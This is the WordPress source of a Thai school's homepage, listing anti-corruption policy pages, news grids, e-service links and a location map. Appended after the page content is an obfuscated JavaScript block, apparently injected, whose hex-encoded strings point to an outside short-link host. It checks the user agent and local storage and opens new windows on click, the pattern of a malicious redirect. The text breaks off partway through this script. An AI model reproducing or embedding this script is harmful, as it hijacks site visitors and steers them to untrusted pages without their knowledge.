data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:embed {\"url\":\"https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\",\"type\":\"rich\",\"providerNameSlug\":\"canva\",\"align\":\"center\"} -->\n<figure class=\"wp-block-embed aligncenter is-type-rich is-provider-canva wp-block-embed-canva\"><div class=\"wp-block-embed__wrapper\">\nhttps://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\